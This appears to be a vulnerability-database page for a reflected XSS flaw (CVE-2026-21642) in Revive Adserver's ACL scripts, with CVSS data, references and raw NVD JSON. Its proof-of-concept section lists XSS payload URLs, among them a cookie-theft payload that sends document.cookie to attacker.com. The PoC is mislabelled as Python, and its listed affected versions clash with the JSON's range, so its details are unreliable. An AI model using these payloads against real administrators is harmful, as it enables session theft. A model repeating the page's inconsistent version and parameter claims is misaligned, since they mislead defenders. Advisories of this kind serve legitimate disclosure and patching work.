CVE-2026-21642

Description

HackerOne community member Patrick Lang (7yr) has reported a reflected XSS vulnerability in the `banner-acl.php` and `channel-acl.php` scripts of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:aquaplatform:revive_adserver:*:*:*:*:*:*:*:* - VULNERABLE

Revive Adserver < 5.1.2

Revive Adserver < 5.0.7

Revive Adserver < 4.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2026-21642 PoC - Reflected XSS in Revive Adserver -->
<!-- Target: banner-acl.php -->
<!-- Usage: Requires logged-in admin to click the link -->

<!-- Basic XSS Payload -->
https://target-server/revive-adserver/banner-acl.php?clientid=<script>alert(document.cookie)</script>

<!-- Alternative Payload using img tag -->
https://target-server/revive-adserver/banner-acl.php?clientid=<img src=x onerror=alert('XSS')>

<!-- Cookie Theft Payload -->
https://target-server/revive-adserver/banner-acl.php?clientid=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Target: channel-acl.php -->
https://target-server/revive-adserver/channel-acl.php?channelid=<script>alert(document.domain)</script>

<!-- HTML Injection Variant -->
https://target-server/revive-adserver/banner-acl.php?clientid=<iframe src="javascript:alert(document.cookie)">

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21642
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21642
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21642/
[4] VulDB https://vuldb.com/cve/CVE-2026-21642
[5] https://hackerone.com/reports/3470970

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21642", "sourceIdentifier": "[email protected]", "published": "2026-01-20T21:16:06.310", "lastModified": "2026-01-30T20:14:51.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HackerOne community member Patrick Lang (7yr) has reported a reflected XSS vulnerability in the `banner-acl.php` and `channel-acl.php` scripts of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed."}, {"lang": "es", "value": "El miembro de la comunidad de HackerOne Patrick Lang (7yr) ha reportado una vulnerabilidad de XSS reflejado en los scripts 'banner-acl.php' y 'channel-acl.php' de Revive Adserver. Un atacante puede crear una URL específica que incluye una carga útil HTML en un parámetro. Si un administrador con sesión iniciada visita la URL, el HTML se envía al navegador y se ejecutarían scripts maliciosos."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aquaplatform:revive_adserver:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.4", "matchCriteriaId": "FB1E6D97-42AD-4A1B-89B3-86356A4B5E59"}]}]}], "references": [{"url": "https://hackerone.com/reports/3470970", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}